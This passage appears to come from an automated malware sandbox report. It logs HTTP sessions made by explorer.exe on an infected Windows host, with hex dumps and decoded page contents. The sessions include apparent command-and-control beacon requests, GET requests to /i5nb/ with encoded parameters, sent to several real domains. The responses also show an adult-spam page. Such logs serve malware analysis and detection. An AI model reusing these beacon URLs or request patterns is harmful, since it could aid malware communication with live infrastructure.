3f 66 61 6d 69 6c 79 3d 4b 61 6c 61 6d 3a 34 30 30 7c 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 34 30 30 2c 36 30 30 2c 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6e 74 61 67 6f 6e 69 73 74 2e 6e 6c 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 62 6c 75 65 3a 20 23 30 30 32 31 35 37 3b 0a 20 20 20 20 2d 2d 70 69 6e 6b 3a 20 23 65 63 30 30 38 63 3b 0a 20 20 20 20 2d 2d 6f 72 61 6e 67 65 3a 20 23 66 66 38 34 30 30 3b 0a 20 20 20 20 2d 2d 64 61 72 6b 2d 6f 72 61 6e 67 65 3a 20 72 67 62 28 32 34 32 2c 20 38 30 2c 20 30 29 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 40 6b 65 79 66 72 61 6d 65 73 20 62 61 63 6b 67 72 6f 75 6e 64 20 7b 0a 0a 20 20 20 20 30 25 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 20 31 30 72 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 20 74 6f 70 3b 0a 20 20 20 20 7d 0a 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 2e 61 70 2d 62 74 6e 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 33 2e 35 72 65 6d 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 2e 37 35 72 65 6d 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 33 30 25 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 2e 32 35 25 3b 0a 7d 0a 0a 2e 61 70 2d 62 74 6e 20 70 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 62 6c 75 65 29 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 2e 35 72 65 6d 3b 0a 7d 0a 0a 2e 61 70 2d 62 74 6e 20 69 6d 67 20 7b 0a 20 20 20 20 77 69 64 74 68 3a
                                                  Data Ascii: 1fa8<!DOCTYPE html><html> <head> <title>Placeholder &ndash; Antagonist</title> <link rel="stylesheet" href="https://www.antagonist.nl/static/css/bootstrap/bootstrap-4.3.1.min.css"> <script src="https://www.antagonist.nl/static/js/jquery/jquery-3.4.1.min.js"></script> <link href="https://fonts.googleapis.com/css?family=Kalam:400|Open+Sans:300,400,600,700&display=swap" rel="stylesheet"> <link rel="icon" href="https://www.antagonist.nl/favicon.ico"> <meta name="viewport" content="width=device-width, initial-scale=1"> <style>:root { --blue: #002157; --pink: #ec008c; --orange: #ff8400; --dark-orange: rgb(242, 80, 0);}</style> <style>@keyframes background { 0% { background-position-y: 10rem; } 100% { background-position-y: top; }}</style> <style>.ap-btn { background-color: white; display: inline-block; height: 3.5rem; border-radius: 1.75rem; width: 30%; margin-left: 2.25%;}.ap-btn p { color: var(--blue); display: inline; line-height: 3.5rem;}.ap-btn img { width:
                                                  Jan 13, 2022 20:22:54.977288008 CET444INData Raw: 20 32 2e 37 35 72 65 6d 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 32 2e 37 35 72 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 2e 33 37 35 72 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2e 32 72 65 6d 3b 0a 20 20 20 20 62 6f 72
                                                  Data Ascii: 2.75rem; height: 2.75rem; margin: .375rem; margin-top: .2rem; border-radius: 100%; padding: 3px;}.ap-chevron { height: 3.5rem; width: 3.5rem; border-radius: 100%; background-color: white; cursor: poi
                                                  Jan 13, 2022 20:22:54.977300882 CET445INData Raw: 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 72 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 61 70 2d 63 68 65 76 72 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 61 70 2d 73 6c
                                                  Data Ascii: in-bottom: 2rem; } .ap-chevron { display: none; } .ap-slider-summary a:nth-child(n+4) { display: none; }}@media (orientation: landscape) { .ap-slider a:nth-of-type(1n+4) { display: none;
                                                  Jan 13, 2022 20:22:54.977313995 CET446INData Raw: 3b 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 62 61 63 6b 67 72 6f 75 6e 64 3b 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 32 73 3b 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
                                                  Data Ascii: ; animation-name: background; animation-duration: 2s; animation-delay: 0.5s; animation-fill-mode: forwards; background-repeat: no-repeat;}html, body, div { overflow-x: hidden;}h1, h2, h3 { text-align: center;
                                                  Jan 13, 2022 20:22:54.977329969 CET448INData Raw: 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 33 70 78 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 64 61 72 6b 2d 6f 72 61 6e 67 65 29 3b 0a 20 20
                                                  Data Ascii: t[type="submit"] { border-width: 3px; border-color: var(--dark-orange); border-style: solid; border-radius: 1.5rem; height: 3rem; width: 9rem; margin: .5rem; padding: .5rem; text-transform: uppercase; ou
                                                  Jan 13, 2022 20:22:54.977346897 CET449INData Raw: 61 6d 65 25 33 44 25 32 32 73 65 61 72 63 68 2e 73 76 67 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 33 43 64 65 66 73 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 69 64 25 33 44 25 32 32 64 65 66 73 32 25 32 32 25 33 45 25 30 41 25
                                                  Data Ascii: ame%3D%22search.svg%22%3E%0A%20%20%3Cdefs%0A%20%20%20%20%20id%3D%22defs2%22%3E%0A%20%20%20%20%3Cstyle%0A%20%20%20%20%20%20%20id%3D%22style1011%22%3E.cls-1%7Bfill%3A%23002157%3B%7D.cls-2%7Bfill%3A%23fff%3B%7D%3C/style%3E%0A%20%20%3C/defs%3E%0A%
                                                  Jan 13, 2022 20:22:54.977365971 CET450INData Raw: 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 64 63 25 33 41 66 6f 72 6d 61 74 25 33 45 69 6d 61 67 65 2f 73 76 67 25 32 42 78 6d 6c 25 33 43 2f 64 63 25 33 41 66 6f 72 6d 61 74 25 33 45 25 30 41 25 32 30
                                                  Data Ascii: 0A%20%20%20%20%20%20%20%20%3Cdc%3Aformat%3Eimage/svg%2Bxml%3C/dc%3Aformat%3E%0A%20%20%20%20%20%20%20%20%3Cdc%3Atype%0A%20%20%20%20%20%20%20%20%20%20%20rdf%3Aresource%3D%22http%3A//purl.org/dc/dcmitype/StillImage%22%20/%3E%0A%20%20%20%20%20%20%
                                                  Jan 13, 2022 20:22:54.977382898 CET452INData Raw: 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 73 74 79 6c 65 25 33 44 25 32 32 66 69 6c 6c 25 33 41 25 32 33 65 38 30 30 30 30 25 33 42 66 69 6c 6c 2d 6f 70 61 63 69 74 79 25 33 41 31 25 32 32
                                                  Data Ascii: %20%20%20%20%20%20%20%20%20%20%20style%3D%22fill%3A%23e80000%3Bfill-opacity%3A1%22%0A%20%20%20%20%20%20%20%20%20%20%20transform%3D%22matrix%280.99999281%2C0%2C0%2C0.99999281%2C9.9331847%2C-8.5856221%29%22%20/%3E%0A%20%20%20%20%20%20%20%20%3Cg%
                                                  Jan 13, 2022 20:22:54.977427006 CET453INData Raw: 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 74 72 61 6e 73 66 6f 72 6d 25 33 44 25 32 32 6d 61 74 72 69 78 25 32 38 30 2e 39 37
                                                  Data Ascii: %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20transform%3D%22matrix%280.97321533%2C0%2C0%2C0.97321533%2C684.29111%2C-11.082039%29%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cg%0A%20%20%20%20%20%20%20%20%20%20%20%20
                                                  Jan 13, 2022 20:22:54.977443933 CET454INData Raw: 25 32 30 25 32 30 74 72 61 6e 73 66 6f 72 6d 25 33 44 25 32 32 6d 61 74 72 69 78 25 32 38 30 2e 37 30 37 31 25 32 43 2d 30 2e 37 30 37 31 25 32 43 30 2e 37 30 37 31 25 32 43 30 2e 37 30 37 31 25 32 43 2d 31 35 2e 31 34 38 37 25 32 43 33 36 2e 35
                                                  Data Ascii: %20%20transform%3D%22matrix%280.7071%2C-0.7071%2C0.7071%2C0.7071%2C-15.1487%2C36.5996%29%22%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class%3D%22st0%22%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
                                                  Jan 13, 2022 20:22:55.004143953 CET456INData Raw: 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 72 79 25 33 44 25 32 32 37 36 2e 31 34 32 33 30 33 25 32 32 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25
                                                  Data Ascii: 0%20%20%20%20%20%20%20%20%20%20%20ry%3D%2276.142303%22%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20rx%3D%2277.13961%22%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20style%3D%22fill%3A%23ff840


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  3192.168.2.2249170122.10.28.1180C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 13, 2022 20:23:00.496769905 CET495OUTGET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== HTTP/1.1
                                                  Host: www.ylhwcl.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:23:00.774905920 CET496INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Thu, 13 Jan 2022 19:23:00 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 1865
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 d5 c5 b1 b1 d5 d7 d5 d5 cd b6 d7 ca d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 39 35 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 30 31 35 34 3b 26 23 32 35 31 30 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 2c 26 23 32 33 34 35 33 3b 26 23 32 33 34 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 30 32 30 34 3b 26 23 32 35 34 34 32 3b 26 23 32 30 30 31 30 3b 26 23 32 33 30 33 39 3b 26 23 32 31 31 38 33 3b 26 23 32 31 33 35 35 3b 26 23 32 39 39 38 33 3b 26 23 33 38 33 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 34 34 35 36 3b 26 23 34 30 36 34 34 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32 38 34 35 39 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 39 35 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 30 31 35 34 3b 26 23 32 35 31 30 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 2c 26 23 32 33 34 35 33 3b 26 23 32 33 34 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 30 32 30 34 3b 26 23 32 35 34 34 32 3b 26 23 32 30 30 31 30 3b 26 23 32 33 30 33 39 3b 26 23 32 31 31 38 33 3b 26 23 32 31 33 35 35 3b 26 23 32 39 39 38 33 3b 26 23 33 38 33 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 34 34 35 36 3b 26 23 34 30 36 34 34 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32 38 34 35 39 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 33 34 35 33 3b 26 23 32 33 34 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 30 32 30 34 3b 26 23 32 35 34 34 32 3b 26 23 32 30 30 31 30 3b 26 23 32 33 30 33 39 3b 26 23 32 31 31 38 33 3b 26 23 32 31 33 35 35 3b 26 23 32 39 39 38 33 3b 26 23 33 38 33 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 34 34 35 36 3b 26 23 34 30 36 34 34 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32
                                                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#31934;&#21697;&#22269;&#20135;&#95;&#20122;&#27954;&#20154;&#25104;&#22312;&#32447;,&#23453;&#23453;&#25105;&#20204;&#25442;&#20010;&#23039;&#21183;&#21355;&#29983;&#38388;&#35270;&#39057;,&#20813;&#36153;&#24456;&#40644;&#26080;&#36974;&#25377;&#30340;&#35270;&#39057;,&#26080;&#36974;&#25377;&#72;&#32905;&#21160;&#28459;&#32593;&#31449;&#20813;&#36153;&#35266;&#30475;</title><meta name="keywords" content="&#31934;&#21697;&#22269;&#20135;&#95;&#20122;&#27954;&#20154;&#25104;&#22312;&#32447;,&#23453;&#23453;&#25105;&#20204;&#25442;&#20010;&#23039;&#21183;&#21355;&#29983;&#38388;&#35270;&#39057;,&#20813;&#36153;&#24456;&#40644;&#26080;&#36974;&#25377;&#30340;&#35270;&#39057;,&#26080;&#36974;&#25377;&#72;&#32905;&#21160;&#28459;&#32593;&#31449;&#20813;&#36153;&#35266;&#30475;" /><meta name="description" content="&#23453;&#23453;&#25105;&#20204;&#25442;&#20010;&#23039;&#21183;&#21355;&#29983;&#38388;&#35270;&#39057;,&#20813;&#36153;&#24456;&#40644;&#26080;&#36974;&#25377;&#30340;&#35270;&#39057;,&#26080;&#36974;&#25377;&#72;&#32905;&#21160;&#2
                                                  Jan 13, 2022 20:23:00.774945021 CET497INData Raw: 38 34 35 39 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30
                                                  Data Ascii: 8459;&#32593;&#31449;&#20813;&#36153;&#35266;&#30475;,&#31934;&#21697;&#22269;&#20135;&#95;&#20122;&#27954;&#20154;&#25104;&#22312;&#32447;,&#20174;&#23567;&#29992;&#26149;&#33647;&#20859;&#22823;&#30340;&#21452;&#24615;&#21463;,&#20122;&#2795


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  4192.168.2.2249171216.172.160.18880C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 13, 2022 20:23:06.112768888 CET498OUTGET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1
                                                  Host: www.terapiaholisticaemformacao.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:23:06.319093943 CET499INHTTP/1.1 404 Not Found
                                                  Date: Thu, 13 Jan 2022 19:23:06 GMT
                                                  Server: Apache
                                                  Upgrade: h2,h2c
                                                  Connection: Upgrade, close
                                                  Last-Modified: Fri, 26 Jul 2019 13:18:26 GMT
                                                  Accept-Ranges: bytes
                                                  Content-Length: 2361
                                                  Vary: Accept-Encoding
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 39 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 39 32 78 31 39 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 30 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 3e
                                                  Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x192"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120">
                                                  Jan 13, 2022 20:23:06.319129944 CET501INData Raw: 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 35 32 2e 70 6e 67 22
                                                  Data Ascii: <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-152.png" sizes="152x152"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-180.png" sizes="180x180"> <link href="/cgi-sys/css/bootstrap.min.


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  5192.168.2.2249172192.185.98.25180C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 13, 2022 20:23:11.619415045 CET501OUTGET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1
                                                  Host: www.ecommerceoptimise.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:23:11.771730900 CET503INHTTP/1.1 404 Not Found
                                                  Date: Thu, 13 Jan 2022 19:23:11 GMT
                                                  Server: Apache
                                                  Upgrade: h2,h2c
                                                  Connection: Upgrade, close
                                                  Last-Modified: Fri, 14 Feb 2020 00:55:46 GMT
                                                  Accept-Ranges: bytes
                                                  Content-Length: 11816
                                                  Vary: Accept-Encoding
                                                  Content-Type: text/html
